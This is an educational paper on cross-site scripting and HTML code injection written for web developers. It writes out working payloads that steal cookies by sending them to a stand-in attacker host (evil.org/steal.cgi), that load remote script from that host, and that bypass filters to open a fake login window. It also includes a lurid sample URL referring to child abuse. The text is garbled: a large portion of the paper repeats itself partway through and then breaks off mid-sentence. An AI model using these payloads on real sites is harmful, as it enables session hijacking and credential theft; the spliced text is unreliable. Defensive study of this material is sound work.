XSS and HTML Code Injection

HTML Code Injection and Cross-site scripting
Understanding the cause and effect of CSS (XSS) Vulnerabilities

As web-based applications have become more sophisticated, the types of vulnerabi
lities are capable of exploiting has rapidly increased. A particular class of at
tacks commonly referred to as code insertion and often Cross-Site Scripting has beco
me increasingly popular. Unfortunately, the number of applications vulnerable to
these attacks is staggering, and the varieties of ways attackers are finding to
successfully exploit them is on the increase. Analysis of many sites has indica
ted that not only are the majority of sites vulnerable, but they are vulnerable
to many different methods and much of their content is affected.
Introduction
Web servers delivering dynamic content to Internet clients constitute an integra
l component of most organisations online service offerings. The ability to tune
content and respond to an individual client request represents standard function
ality for any successful site. Unfortunately, due to poorly developed applicatio
n code and data processing systems, the majority of these successful sites are v
ulnerable to attacks that focus upon the way HTML content is generated and inter
preted by client browsers. Attackers are often able to embed malicious HTML-base
d content within client web requests. With sufficient forethought and analysis,
attackers can exploit these flaws by embedding scripting elements within the ret
urned content without the knowledge of the sites visitor.
Although the potential dangers have been known for several years now, the recent
successes and improved understanding of cross-site scripting attacks has increa
sed the importance of correctly handing user input within dynamically generated
web content. High profile sites have already been shown to be susceptible to cro
ss-site scripting attack. Future attacks are likely to become more sophisticated
and, through automation and exploitation of client browser vulnerabilities, man
y times more devastating.
This document aims to educate those responsible for the management and developme
nt of commercial online services by providing the information necessary to under
stand the significance of the threat, and provide advice on securing application
s against this type of attack.
Code Insertion
The success of this type of attack hinges upon the functionality of the client b
rowser. In HTML, to distinguish displayable text from the interpreted markup lan
guage, some characters are treated specially. One of the most common special cha
racters used to define elements within the markup language is the < character, and
is typically used to indicate the beginning of an HTML tag. These tags can eith
er affect the formatting of the page or induce a program that the client browser
executes (e.g. the <SCRIPT> tag introduces a JavaScript program).
As most web browsers have the ability to interpret scripts embedded within HTML
content enabled by default, should an attacker successfully inject script conten
t, it will likely be executed within context of the delivery (e.g. website, HTML
help, etc.) by the end user. Such scripts may be written in any number of scrip
ting languages, provided that the client host can interpret the code. Scripting
tags that are most often used to embed malicious content include <SCRIPT>, <OBJE
CT>, <APPLET> and <EMBED>.
While this document largely focuses upon the threat presented through the inject
ion of malicious scripting code, other tags may be inserted and abused by an att
acker. Consider the <FORM> tag by inserting the appropriate HTML tag information
, an attacker could trick visitors to the site into revealing sensitive informat
ion by modifying the behaviour of the existing form for instance. Other HTML tag
s may be inserted to alter the appearance and behaviour of a page (e.g. alterati
on of an organisations online annual accounts or presidents statement?).
It is important to understand the HTML tags that are most commonly used to carry
out code insertion tags. The following table details the most important attribu
tes of these tags. However, it is important to note that alternative in-line scrip
ting elements may be used and interpreted by the current generation of web brows
ers, such as javascript:alert('executing script').
HTML Tag Description
<SCRIPT> Adds a script that is to be used in the document.
Attributes:
* type = Specifies the language of the script. Its value must be a media typ
e (e.g. text/javascript). This attribute is required by the HTML 4.0 specificati
on and is a recommended replacement for the language attribute.
* language = Identifies the language of the script, such as JavaScript or VB
Script.
* src = Specifies the URL of an outside file containing the script to be loa
ded and run with the document. (Netscape only)
Supported by: Netscape, IE 3+, HTML 4, Opera 3+
<OBJECT> Places an object (such as an applet, media file, etc.) on a docu
ment. The tag often contains information for retrieving ActiveX controls that IE
uses to display the object.
Attributes:
* classid = Identifies the class identifier of the object.
* codebase = Identifies the URL of the objects codebase.
* codetype = Specifies the media type of the code. Examples of code types in
clude audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)
* data = Specifies the URL of the data used for the object.
* name = Specifies the name of the object to be referenced by scripts on the
page.
* standby = Specifies the message to display while the object loads.
* type = Specifies the media type for the data.
* usemap = Specifies the imagemap URL to use with the object.
Supported by: Netscape, IE, HTML 4
<APPLET> Used to place a Java applet on a document. It is depreciated in
the HTML 4.0 specification in favour of <object> tag.
Attributes:
* code = Specifies the class name of the code to be executed (required).
* codebase = The URL from which the code is retrieved.
* name = Names the applet for reference elsewhere on the page.
Supported by: Netscape, IE 3+, HTML 4
<EMBED> Embeds an object into the document. Embedded objects are most often mult
imedia files that require special plug-ins to display. Specific media types and
their respective plug-ins may have additional proprietary attributes for control
ling the playback of the file. The closing tag is not always required, but is re
commended. The tag was dropped by the HTML 4.0 specification in favour of the <o
bject> tag.
Attributes:
* hidden = Hides the media file or player from view when set to yes.
* name = Specifies the name for the embedded object for later reference with
in a script.
* pluginspage = Specifies the URL for information on installing the appropri
ate plug-in.
* src = Provides the URL to the file or object to be placed on the document.
(Netscape 4+ and IE 4+ only)
* code = Specifies the class name of the Java code to be executed. (IE only)
* codebase = Specifies the base URL for the application. (IE only)
* pluginurl = Specifies a source for installing the appropriate plug-in for
the media file. (Netscape only)
* type = Specifies the MIME type of the plug-in needed to run the file. (Net
scape only)
Supported by: Netscape, IE 3+, Opera 3+
<FORM> Indicates the beginning and end of a form.
Attributes:
* action = Specifies the URL of the application that will process the form.
* enctype = Specifies how the values for the form controls are encoded when
they are submitted to the server.
* method = Specifies which HTTP method will be used to submit the form data.
* target = Specifies a target window for the results of the form submission
to be loaded ( _blank, _top, _parent, and _self).
Supported by: All
Malicious Code
An embedded code attack is heavily dependant upon the delivery mechanism. Thus t
he delivery method often dictates the audience the script will potentially affec
t.
It is interesting to note that such attacks have been around since before the In
ternet and HTML. Back in the days of dial-up Bulletin Boards Systems (BBS), the
problem was site visitors encoding their messages in coloured ASCII and later, t
he use of vector drawing languages permitted users to redesign pages themselves.
Thus many sites hosting discussion groups with user interfaces learnt along tim
e ago to rigorously control the content that be could submitted.
An early problem for web-based discussion groups was the over-use and unintended
misuse of standard HTML tags. For instance, early message boards merely took th
e user submitted text from a standard POST form. This data was then added to the
discussion page, without any further processing. Users often included text form
atting tags to bold, italicise or colour their text making a greater visual impa
ct to their message. Unfortunately, it was not uncommon for someone to forget to
provide a closing format tag, resulting in the unintentional effect of altering
every following message on the page. Now consider the implications of a user em
bedding the following two code snippets in their posting and what the implicatio
ns would be to everyone viewing the message.
Hello World! <SCRIPT>malicious code</SCRIPT>
Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">
Unfortunately, attackers are finding ever more ingenious methods of encoding the
ir embedded attacks, and consequently many more sites are vulnerable.
Of particular importance is the abuse of trust. Consider a trusted site with a p
oorly coded search engine. An attacker may be able to embed their malicious code
within a hyperlink to the site. When the client web browser follows the link, t
he URL sent to trusted.org includes malicious code. The site sends a page back t
o the browser including the value of criteria, which consequently forces the exe
cution of code from the evil attackers server. For example;
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/bad
kama.js'></SCRIPT>"> Go to trusted.org</A>
In the attack above, one source is inserting code into pages sent by another sou
rce.
It should be noted that this attack:
disguises the link as a link to http://trusted.org,
can be easily included in an HTML email message,
does not supply the malicious code inline, but is downloaded from http://evil.or
g. Thus the attacker retains control of the script and can update or remove the
exploit code at anytime.
This class of vulnerability is popularly referred to as cross-site scripting (CS
S or sometimes XSS).
Cross Site Scripting
A cross-site scripting vulnerability is caused by the failure of an web based ap
plication to validate user supplied input before returning it to the client syst
em. Cross-Site refers to the security restrictions that the client browser usually
places on data (i.e. cookies, dynamic content attributes, etc.) associated with
a web site. By causing the victims browser to execute injected code under the sa
me permissions as the web application domain, an attacker can bypass the traditi
onal Document Object Model (DOM) security restrictions which can result not only
in cookie theft but account hijacking, changing of web application account sett
ings, spreading of a webmail worm, etc.
Note that the access that an intruder has to the Document Object Model (DOM) is
dependent on the security architecture of the language chosen by the attacker. S
pecifically, Java applets do not provide the attacker with any access beyond the
DOM and are restricted to what is commonly referred to as a sandbox.
The most common web components that fall victim to CSS/XSS vulnerabilities inclu
de CGI scripts, search engines, interactive bulletin boards, and custom error pa
ges with poorly written input validation routines. Additionally, a victim doesnt
necessarily have to click on a link; CSS code can also be made to load automatic
ally in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags
.
The most popular CSS/XSS attack (and devastating) is the harvesting of authentic
ation cookies and session management tokens. With this information, it is often
a trivial exercise for an attacker to hijack the victims active session, complet
ely bypassing the authentication process. Unfortunately, the mechanism of the at
tack is very simple and can be easily automated. A detailed paper by iDefence go
es into great detail explaining the process, but can be quickly summarised as fo
llows:
1. The attacker investigates an interesting site that normal users must authe
nticate to gain access to, and that tracks the authenticated user through the us
e of cookies or session IDs
2. The attacker finds a CSS vulnerable page on the site, for instance http://
trusted.org/ account.asp.
3. Using a little social engineering, the attacker creates a special link to
the site and embeds it in an HTML email that he sends to a long list of potentia
l victims.
4. Embedded within the special link are some coding elements specially design
ed to transmit a copy of the victims cookie back to the attacker. For instance:
<img src="http://trusted.org/account.asp?ak=<script>document.location .replace('
http://evil.org/steal.cgi?'+document.cookie);</script>">
5. Unknown to the victim, the attacker has now received a copy of their cooki
e information.
The attacker now visits the web site and, by substituting his cookie information
with that of the victims, is now perceived to be the victim by the server appli
cation.
Note that Cross-site scripting is commonly referred to as CSS and/or XSS.
Understanding Code Insertion
To date, security professions have discovered an ever increasing number of metho
ds for potentially embedding code within poorly configured web applications. The
following are some of the more common methods for doing so.
Inline Scripting
http://trusted.org/search.cgi?criteria=<script>code</script>
http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SC
RIPT>
http://trusted.org/COM2.IMG%20src= "Javascript:alert(document.domain)"
Forced Error Responses
http://trusted.org/<script>code</script>
This insertion facet usually occurs due to poor error handling by the web server
or application component. The application fails to find the requested page and
reports an error which unfortunately includes the unprocessed script data.
http://trusted.org/search.cgi?blahblahblahblahblah<script>code</script>
If a Java application such as a servlet fails to handle an error gracefully, and
allows stack traces to be sent to the users browser, an attacker can construct
a URL that will throw an exception and add his malicious script to the end of th
e request.
http://trusted.og/servlet/ org.apache.catalina.servlets.WebdavStatus/<script>cod
e</script>
In the example above, when the Tomcat servlet is called with the training illegi
timate request, an error page is served containing the offending text verbatim.
Non <SCRIPT> Events
" [event]='code'
In many cases it may be possible for an attacker to insert an exploit string, wi
th the above syntax, into a HTML tag that should have been like:
<A HREF="exploit string">Go</A>
resulting in:
<A HREF="" [event]='code'">Go</A>
<b onMouseOver="self.location.href='http://evil.org/'">bolded text</b>
As the client cursor moves over the bolded text, an intrinsic event occurs and t
he JavaScript code is executed.
JavaScript Entities
<img src="&{alert('CSS Vulnerable')};">
The special character & is sometimes interpreted as a new JavaScript code segment
(entity).
Typical Payloads Formatting
<img src = "malicious.js">
<script>alert('hacked')</script>
<iframe = "malicious.js">
<script>document.write('<img src="http://evil.org/'+document.cookie+'") </script
>
<a href="javascript:">click-me</a>
Insertion Example
Dynamic URL Generation
Consider an application built for running on Microsofts Internet Information Serv
er (IIS) web server platform. Dynamic content is delivered through IISs Active Se
rver Pages (ASP).
Within the sample page, a dynamically built HTML tag for refining search paramet
ers is constructed as follows:
<A HREF="http://trusted.org/search_main.asp? searchstring=SomeString">click-me</
A>
and the ASP code required to generate a further query based upon this submitted
information is:
<%
var BaserUrl = "http://trusted.org/search2.asp?
searchagain=";Response.Write("<a href=\"" + BaseUrl
+ Request.QueryString("SearchString") + "\">click-me</a>" )
%>
If the attacker was to replace the SomeString with their own code, as indicated ne
xt:
<a href="http://trusted.org/search_main.asp?
SearchString=%22+onmouoseover%3D%27ClientForm%
2Eaction%3D%22evil%2Eorg%2Fget%2Easp%3FData%
3D%22+%2B+ClientForm%2EPersonalData%3BClientForm%
2Esubmit%3B%27">FooBar</a>
The likely result found in the dynamically generated ASP page will be:
<A HREF="http://trusted.org/search2.asp?
searchagain="" onmouoseover='ClientForm.
action="evil.org/get.asp?Data=" +
ClientForm.PersonalData;ClientForm.
submit;'">click-me</A>
In this case, the attacker has added to the HTML page code, and used the DOM of
the HTML page to redirect data in some form to the attackers web site.
Bypassing Anti-CSS Filters
A key function of any application filtering process will be the removal of possi
ble dangerous special characters. However, in many circumstances it may be diffi
cult to filter a large range of these characters due to the applications unique
requirements.
Corporate application developers must carefully evaluate how their code will per
form with a variety of attack strings. In addition, they should fully understand
the different methods that special characters can be encoded.
One of the most popular alternative character representations is HTML escaped en
coding, sometimes mistakenly referred to as Unicode encoding. In this system, th
e HEX value of the ASCII character is prefixed with the % character.
Char ; / ? : @ = & < >
#
Code %3b %2f %3f %3a %40 %3d %26 %3c %3e
%22 %23

Char { } | \ ^ ~ [ ] `
%
Code %7b %7d %7c %5c %5e %7e %5b %5d %60
%25 %27
To better understand the processes behind bypassing Anti-CSS filtering mechanism
s, a series of detailed examples are provided below.
Inserting Malicious Code
Simple Filtering of < and >
Many applications that implement some kind of content filtering will typically f
ilter out the < and > characters at the client-side. At first glance, this looks lik
e an effective way of ensuring <script> type HTML tags are not possible. Unfortu
nately, not only client-side code easy to bypass, in many circumstances it can b
e bypassed using a mix of alternative character representations and other specia
l characters.
Consider a routine that removes the < and > special characters:
document.write(cleanSearchString('<>'));
The attacker now uses an alternative coding for the filtered characters, \x3c and \
x3e respectively, and initialises their code with ) + to escape out of the routine.
') + '\x3cscript src=http://evil.org/malicious.js\x3e\x3c/script\x3e'
Commenting out malicious code
Consider an application that filters content on behalf of it clients by causing
any scripting content to be safely commented out. For instance, <script>code</scri
pt> is filtered by the application to become:
<COMMENT>

</COMMENT>
Unfortunately, it is a simple task to bypass the filter. This is accomplished by
including script code that will close the <comment> filter process. For example
, the attacker can send the following code:
<script>
- -->
</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open( http://evil.
org/fakeloginscreen.jsp); ">
</script>
After processing by the filter, the following code is embedded in the returned d
ocument:
<COMMENT>

</COMMENT>
<img src="http://none" onerror="alert(document.cookie);window.open(http://evil.o
rg/ fakeloginscreen.jsp);">
</COMMENT>
This particular attack was originally designed to bypass the security filtering
processes of a large web-mail provider, and would have been embedded in HTML ema
il content. Users viewing the email would automatically be prompted with a fake
login screen, making for an easy method of harvesting user names and passwords.
Separate Window Handling
A popular method of handling potentially dangerous URL information is to force t
he URL to be opened in a new browser window. This then causes and malicious code
to be executed in the context of a different DOM, using the target=_blank addition
to the HTML <HREF> tag.
Unfortunately, in many online email applications it is possible to bypass after
analysing the harmless link supplied by the site.
Consider a site that parses the content,
and, after processing, becomes:
<a href="javascript:" target="_blank">click-me</a>
Causing the URL to be opened in a new window.
However, if the attacker constructs his HREF as follows,
<a href="javascript:..." foo="bar>click-me</a>
it will be interpreted as:
<a href="javascript:..." foo="bar target="_blank">click-me</a>
causing the code to be executed in the same page, under the same DOM.
Escaped JavaScript Entities
In cases where almost all special characters have are filtered from user supplie
d strings, attackers must encode the entire attack string.
Consider the following URL:
http://trusted.org/search.cgi?query=%26%7balert%28%27EVIL %27%29%7d%3b&apropos=p
os2
The %26%7balert%28%27EVIL%27%29%7d%3b resolves to &{alert('EVIL')}; causing in thi
s instance an unexpected JavaScript alert window to popup, with the text EVIL.
Web Integration
As client web browsers have evolved, they have incorporated an increasingly dive
rse range of functions. At the same time, many common desktop applications have
extended their functionality to replicate or incorporate the functionality of th
ese same browsers. While the security flaw may be HTML injection, and more speci
fically CSS, the avenues available for a malicious user or attacker to initiate
the attack are becoming ever broader. As is already evident, a popular personalis
ed delivery mechanism has now become HTML email. Unfortunately, the delivery meth
ods are becoming so diverse that no single security solution is available to preve
nt the attack. Consider the significance of the following delivery mechanisms.
The Flash! Attack
Flash! is a popular application for displaying animated visual information. Is h
as its own development language (ActiveScript) for creating sophisticated interac
tive menus, animated movies and games. The most popular web browsers often insta
ll the interpreter for these files by default and, due to the large number of si
tes that use the technology; many people will install the interpreter even if it
wasnt originally available with their web browser.
ActiveScript has an internal function called getURL(). This function is used for
redirecting the client browser to another page. Normally the parameter supplied
to the function would be a URL. However, due to integration features between th
e Flash! interpreter and the web browser, it is possible to insert scripting cod
e that would be successfully interpreted by the client web browser.
For instance, instead of:
getURL("http://www.technicalinfo.net")
It is possible to specify scripting code:
getURL("javascript:alert(document.cookie)")
Thus, it is possible to embed potentially dangerous scripting elements within a
common file format. The real significance of this threat is that it potentially
bypasses many corporate content inspection systems (particularly those that filt
er out HTML <script> type tags) and local security web browser settings.
For an attack to be successful, the dangerous Flash! file (typically terminating
in a .swf extension) must be embedded within HTML data for viewing by remote clie
nts. Normally this occurs with the use of the <EMBED> or <OBJECT> tags, for inst
ance:
<EMBED
src="http://evil.org/badflash.swf" pluginspage="http://www.macromedia.com/shockw
ave/download/index.cgi?
P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash"
width="100"
height="100">
</EMBED>
The Impact
The impact of malicious code insertion is often difficult to quantify and will c
hange as new functionality or interactions are incorporated into both web server
s and client browsers. Already, users may unintentionally execute scripts writte
n by an attacker when they follow untrusted links in web pages, mail or instant
messages, or any other application capable of displaying HTML content (e.g. Micr
osoft Help). For this reason, a series of examples best illustrate the diversity
and impact of potential threats.
Consider the following examples:
* An attacker often has access to the document retrieved since the malicious
scripts are executed in a context that appears to have originated from the trus
ted site. With the appropriate insertions, a script could be used to read fields
in a form provided by the trusted server and send this data back to the attacke
r.
* An attacker may be able to embed script code that has additional interacti
ons with the legitimate web server without alerting the victim. For example, the
attacker could develop an exploit that posted data to a different page on the l
egitimate web server.
* An attacker may be able to poison the sites persistent cookies, thus modif
ying the cookie content and causing malicious code to be executed each time the
user visits the trusted site. The malicious code is stored as a field variable w
ithin the cookie, and executed each time the site dynamically generates page con
tent without the correct processing.
* An attacker may be able to cause a hidden window to start on the client mach
ine and us this to key-log all browser interaction of the victim. Should the vic
tim later visit sites requiring authentication, the attacker could harvest this
information.
* CSS type attacks can occur over SSL-encrypted connections. The victim, acc
essing a trusted host over HTTPS, may still execute an attackers code unintentio
nally. If the attacker references document components on a remote host, the vict
ims client browser may generate a warning message about the insecure connection.
However, the attacker can circumvent this warning by simply referencing content
on a SSL-capable web server.
* An attacker may construct the malicious code to reference internal resourc
es. Thus, an attacker may gain unauthorised access to an Intranet web server. On
ly one page on one web server in a domain is required to compromise the entire d
omain.
* An attacker may be able to bypass policies that prevent the victim browser
from executing scripts. For example, Internet Explorer security zones may prevent
the execution of scripts from untrusted Internet hosts. An attacker may embed t
heir code within the content of a trusted internal host.
* An attacker may use a social engineering aspect to the attack. Consider an
application that requires clients to complete a form to set up their account. A
n attacker may be able to insert malicious code into their application data. A q
uick phone call to the corporate help-desk asking for advice on their account ma
y cause the execution of the malicious code on the help-desk system.
* Even if the victims web browser does not support scripting, an attacker may
still be able to alter the content of the page affecting its appearance, behavi
our or normal operation.
To date the most popular application content to be targeted by attackers has bee
n web pages that:
* Return results based upon user input to search engines,
* Process credit card information,
* Store and user supplied content in databases and cookies for later retriev
al.
Vulnerability Checking
Finding out if your application is vulnerable to a code insertion attack is ofte
n very simple. The key lies in the analysis of the dynamically generated client-
side HTML content. The following process has been frequently used in the past.
1. For each visible input field (these may be located in an HTML form, or rep
resented in the URL as variable=), try the most obvious scripting formats:
<script>alert('CSS Vulnerable')</script>
<img csstest=javascript:alert('CSS Vulnerable')>
&{alert('CSS Vulnerable')};
In any case, should an alert message popup with the text CSS Vulnerable, the
application component is vulnerable - specifically the input field just checked
.
2. If, either of the above scripting checks cause the HTML page to display in
correctly, the application component may still be vulnerable.
3. For each visible variable, submit/substitute the following string:
'';!--"<CSS_Check>=&{()} (Note that the string begins with two single-quot
es)
On the resultant page, search for the string <CSS_Check>. If you discover <CS
_Check>, it is quite probable that the application component is vulnerable. Howev
er, if the word CSS_Check is no longer enclosed in something similar to %ltCSS_C
heck%gt, then it may not be vulnerable. If input is displayed literally at ANY p
oint in the document, it can be used to divert the flow of execution to an attac
ker-supplied payload.
4. Having located the word CSS_Check, verify what (if any) other characters h
ave be altered or filtered from the original string '';!--"<CSS_Check>= &{()}. Dep
ending upon the filtered characters, the application component may still be vuln
erable.
5. Looking closely at the returned HTML code, identify the specific string an
attacker would need to break out of the current HTML tag or code sequence. If t
hese characters exist, unfiltered, in responses to the test string of part 3 (ab
ove) then there is a high probability that the application component is vulnerab
le.
6. Moving on from the obvious fields, repeat the process for all the hidden f
ields not normally editable at the client end. The best method of doing this is
through the use of a free local host proxy server such as Achilles by DigiZen Se
curity group and WebProxy by @stake. The proxy servers allow the editing of HTTP
requests as they leave the client application, before being finally sent to the
server application.
7. In many cases, data will be submitted via the HTTP GET request. Throughout
the investigation, take note of potentially vulnerable application components t
hat require the HTTP POST command to submit data.
It is a simple process of turning a POST into a GET submission. If the applicati
on component fails to respond to the GET the same way as it did for the POST sub
mission, it is probably not vulnerable to a URL based inline scripting attack.
Putting It All Together
To bring together many of the ideas and processes discussed earlier in this docu
ment, an example can be used to bring it all together. In this example, the anon
ymous site has a search engine that responds to client data submissions. Normall
y the site would look like this:
Taking a closer look at the content source, we notice that our sample code appea
rs 21 times in the document, in various formats.
It appears 10 times in a format similar to:
<SCRIPT language="JavaScript1.1" SRC="http://ad.uk.doubleclick.net/adj/
anonymous.com/search;cat=search;sec=search;kw=<script>alert('css_vulnerable')
</script>;pos=top;sz=468x60;tile=1;ptile=1;ord=-308506361?"></SCRIPT>
9 times in a format similar to:
<a href="Search?q=%3Cscript%3Ealert%28%27CSS+Vulnerable%27%29%3C%2Fscript
%3E&pager.offset=10">2</a>
And twice in the format similar to:
document.writeln('<INPUT TYPE=\"TEXT\" NAME=\"q\" SIZE=\"16\" MAXLENGTH=\
"70\" VALUE=\'<script>alert('CSS Vulnerable')</script>\'>');
Obviously there are three different server-side processing routines for processi
ng client search data.
1. In the first type (ad.uk.doubleclick.net format), it appears that the proc
essing routine changes the case of characters and changes white space to the und
erscore (_).
2. The second type (href=) converts special characters into their escape-enco
ded formats, and white space into the + character.
3. The third type (document.writeln) places the complete string within a docu
ment.writeln JavaScript routine.
Several opportunities present themselves here. To make the site execute the Java
Script alert box for each type, we need to force the <script> tags outside of an
y other HTML tags. Thus, for each type, the following methods will work:
1. ><script>alert('CSS Vulnerable')</script><b a=a
2. a></a><script>alert('CSS Vulnerable')</script>
3. \'><script>alert%28\'CSS Vulnerable\'%29</script><
The result is the following alert box (multiple times):
HTML Code Injection and Cross-site scripting
Understanding the cause and effect of CSS (XSS) Vulnerabilities

As web-based applications have become more sophisticated, the types of vulnerabi
lities are capable of exploiting has rapidly increased. A particular class of at
tacks commonly referred to as code insertion and often Cross-Site Scripting has beco
me increasingly popular. Unfortunately, the number of applications vulnerable to
these attacks is staggering, and the varieties of ways attackers are finding to
successfully exploit them is on the increase. Analysis of many sites has indica
ted that not only are the majority of sites vulnerable, but they are vulnerable
to many different methods and much of their content is affected.
Introduction
Web servers delivering dynamic content to Internet clients constitute an integra
l component of most organisations online service offerings. The ability to tune
content and respond to an individual client request represents standard function
ality for any successful site. Unfortunately, due to poorly developed applicatio
n code and data processing systems, the majority of these successful sites are v
ulnerable to attacks that focus upon the way HTML content is generated and inter
preted by client browsers. Attackers are often able to embed malicious HTML-base
d content within client web requests. With sufficient forethought and analysis,
attackers can exploit these flaws by embedding scripting elements within the ret
urned content without the knowledge of the sites visitor.
Although the potential dangers have been known for several years now, the recent
successes and improved understanding of cross-site scripting attacks has increa
sed the importance of correctly handing user input within dynamically generated
web content. High profile sites have already been shown to be susceptible to cro
ss-site scripting attack. Future attacks are likely to become more sophisticated
and, through automation and exploitation of client browser vulnerabilities, man
y times more devastating.
This document aims to educate those responsible for the management and developme
nt of commercial online services by providing the information necessary to under
stand the significance of the threat, and provide advice on securing application
s against this type of attack.
Code Insertion
The success of this type of attack hinges upon the functionality of the client b
rowser. In HTML, to distinguish displayable text from the interpreted markup lan
guage, some characters are treated specially. One of the most common special cha
racters used to define elements within the markup language is the < character, and
is typically used to indicate the beginning of an HTML tag. These tags can eith
er affect the formatting of the page or induce a program that the client browser
executes (e.g. the <SCRIPT> tag introduces a JavaScript program).
As most web browsers have the ability to interpret scripts embedded within HTML
content enabled by default, should an attacker successfully inject script conten
t, it will likely be executed within context of the delivery (e.g. website, HTML
help, etc.) by the end user. Such scripts may be written in any number of scrip
ting languages, provided that the client host can interpret the code. Scripting
tags that are most often used to embed malicious content include <SCRIPT>, <OBJE
CT>, <APPLET> and <EMBED>.
While this document largely focuses upon the threat presented through the inject
ion of malicious scripting code, other tags may be inserted and abused by an att
acker. Consider the <FORM> tag by inserting the appropriate HTML tag information
, an attacker could trick visitors to the site into revealing sensitive informat
ion by modifying the behaviour of the existing form for instance. Other HTML tag
s may be inserted to alter the appearance and behaviour of a page (e.g. alterati
on of an organisations online annual accounts or presidents statement?).
It is important to understand the HTML tags that are most commonly used to carry
out code insertion tags. The following table details the most important attribu
tes of these tags. However, it is important to note that alternative in-line scrip
ting elements may be used and interpreted by the current generation of web brows
ers, such as javascript:alert('executing script').
HTML Tag Description
<SCRIPT> Adds a script that is to be used in the document.
Attributes:
* type = Specifies the language of the script. Its value must be a media typ
e (e.g. text/javascript). This attribute is required by the HTML 4.0 specificati
on and is a recommended replacement for the language attribute.
* language = Identifies the language of the script, such as JavaScript or VB
Script.
* src = Specifies the URL of an outside file containing the script to be loa
ded and run with the document. (Netscape only)
Supported by: Netscape, IE 3+, HTML 4, Opera 3+
<OBJECT> Places an object (such as an applet, media file, etc.) on a docu
ment. The tag often contains information for retrieving ActiveX controls that IE
uses to display the object.
Attributes:
* classid = Identifies the class identifier of the object.
* codebase = Identifies the URL of the objects codebase.
* codetype = Specifies the media type of the code. Examples of code types in
clude audio/basic, text/html, and image/gif. (IE and HTML 4.0 only)
* data = Specifies the URL of the data used for the object.
* name = Specifies the name of the object to be referenced by scripts on the
page.
* standby = Specifies the message to display while the object loads.
* type = Specifies the media type for the data.
* usemap = Specifies the imagemap URL to use with the object.
Supported by: Netscape, IE, HTML 4
<APPLET> Used to place a Java applet on a document. It is depreciated in
the HTML 4.0 specification in favour of <object> tag.
Attributes:
* code = Specifies the class name of the code to be executed (required).
* codebase = The URL from which the code is retrieved.
* name = Names the applet for reference elsewhere on the page.
Supported by: Netscape, IE 3+, HTML 4
<EMBED> Embeds an object into the document. Embedded objects are most often mult
imedia files that require special plug-ins to display. Specific media types and
their respective plug-ins may have additional proprietary attributes for control
ling the playback of the file. The closing tag is not always required, but is re
commended. The tag was dropped by the HTML 4.0 specification in favour of the <o
bject> tag.
Attributes:
* hidden = Hides the media file or player from view when set to yes.
* name = Specifies the name for the embedded object for later reference with
in a script.
* pluginspage = Specifies the URL for information on installing the appropri
ate plug-in.
* src = Provides the URL to the file or object to be placed on the document.
(Netscape 4+ and IE 4+ only)
* code = Specifies the class name of the Java code to be executed. (IE only)
* codebase = Specifies the base URL for the application. (IE only)
* pluginurl = Specifies a source for installing the appropriate plug-in for
the media file. (Netscape only)
* type = Specifies the MIME type of the plug-in needed to run the file. (Net
scape only)
Supported by: Netscape, IE 3+, Opera 3+
<FORM> Indicates the beginning and end of a form.
Attributes:
* action = Specifies the URL of the application that will process the form.
* enctype = Specifies how the values for the form controls are encoded when
they are submitted to the server.
* method = Specifies which HTTP method will be used to submit the form data.
* target = Specifies a target window for the results of the form submission
to be loaded ( _blank, _top, _parent, and _self).
Supported by: All
Malicious Code
An embedded code attack is heavily dependant upon the delivery mechanism. Thus t
he delivery method often dictates the audience the script will potentially affec
t.
It is interesting to note that such attacks have been around since before the In
ternet and HTML. Back in the days of dial-up Bulletin Boards Systems (BBS), the
problem was site visitors encoding their messages in coloured ASCII and later, t
he use of vector drawing languages permitted users to redesign pages themselves.
Thus many sites hosting discussion groups with user interfaces learnt along tim
e ago to rigorously control the content that be could submitted.
An early problem for web-based discussion groups was the over-use and unintended
misuse of standard HTML tags. For instance, early message boards merely took th
e user submitted text from a standard POST form. This data was then added to the
discussion page, without any further processing. Users often included text form
atting tags to bold, italicise or colour their text making a greater visual impa
ct to their message. Unfortunately, it was not uncommon for someone to forget to
provide a closing format tag, resulting in the unintentional effect of altering
every following message on the page. Now consider the implications of a user em
bedding the following two code snippets in their posting and what the implicatio
ns would be to everyone viewing the message.
Hello World! <SCRIPT>malicious code</SCRIPT>
Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov">
Unfortunately, attackers are finding ever more ingenious methods of encoding the
ir embedded attacks, and consequently many more sites are vulnerable.
Of particular importance is the abuse of trust. Consider a trusted site with a p
oorly coded search engine. An attacker may be able to embed their malicious code
within a hyperlink to the site. When the client web browser follows the link, t
he URL sent to trusted.org includes malicious code. The site sends a page back t
o the browser including the value of criteria, which consequently forces the exe
cution of code from the evil attackers server. For example;
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/bad
kama.js'></SCRIPT>"> Go to trusted.org</A>
In the attack above, one source is inserting code into pages sent by another sou
rce.
It should be noted that this attack:
disguises the link as a link to http://trusted.org,
can be easily included in an HTML email message,
does not supply the malicious code inline, but is downloaded from http://evil.or
g. Thus the attacker retains control of the script and can update or remove the
exploit code at anytime.
This class of vulnerability is popularly referred to as cross-site scripting (CS
S or sometimes XSS).
Cross Site Scripting
A cross-site scripting vulnerability is caused by the failure of an web based ap
plication to validate user supplied input before returning it to the client syst
em. Cross-Site refers to the security restrictions that the client browser usually
places on data (i.e. cookies, dynamic content attributes, etc.) associated with
a web site. By causing the victims browser to execute injected code under the sa
me permissions as the web application domain, an attacker can bypass the traditi
onal Document Object Model (DOM) security restrictions which can result not only
in cookie theft but account hijacking, changing of web application account sett
ings, spreading of a webmail worm, etc.
Note that the access that an intruder has to the Document Object Model (DOM) is
dependent on the security architecture of the language chosen by the attacker. S
pecifically, Java applets do not provide the attacker with any access beyond the
DOM and are restricted to what is commonly referred to as a sandbox.
The most common web components that fall victim to CSS/XSS vulnerabilities inclu
de CGI scripts, search engines, interactive bulletin boards, and custom error pa
ges with poorly written input validation routines. Additionally, a victim doesnt
necessarily have to click on a link; CSS code can also be made to load automatic
ally in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags
.
The most popular CSS/XSS attack (and devastating) is the harvesting of authentic
ation cookies and session management tokens. With this information, it is often
a trivial exercise for an attacker to hijack the victims active session, complet
